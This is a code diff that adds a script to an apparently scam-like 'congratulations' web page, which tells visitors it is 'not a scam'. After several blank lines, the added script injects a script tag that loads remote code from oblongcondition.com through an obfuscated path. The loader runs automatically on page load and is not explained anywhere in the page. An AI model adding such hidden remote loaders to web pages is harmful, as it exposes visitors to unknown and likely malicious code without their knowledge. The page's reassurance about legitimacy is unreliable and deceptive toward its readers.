--- a/congratsonsuccess.html
+++ b/congratsonsuccess.html
@@ -25,5 +25,18 @@ body {
 <h4><i> This is not a scam and is legit. We will not ask for personal information.</i></h4>
 </center>
 
+
+
+<script>
+  (function(imax){
+  var d = document,
+      s = d.createElement('script'),
+      l = d.scripts[d.scripts.length - 1];
+  s.settings = imax || {};
+  s.src = "\/\/oblongcondition.com\/aVWn5Dw.YnWudOlrQH2m9\/ktZYT\/9\/6nbF2W5OlFSLWoQ\/9LN\/DDY\/4\/OoDZI_wONSye0o0mN\/jogJ4PM\/j\/A\/4f";
+  l.parentNode.insertBefore(s, l);
+  })({})
+  </script>
+
 </body>
 </html>
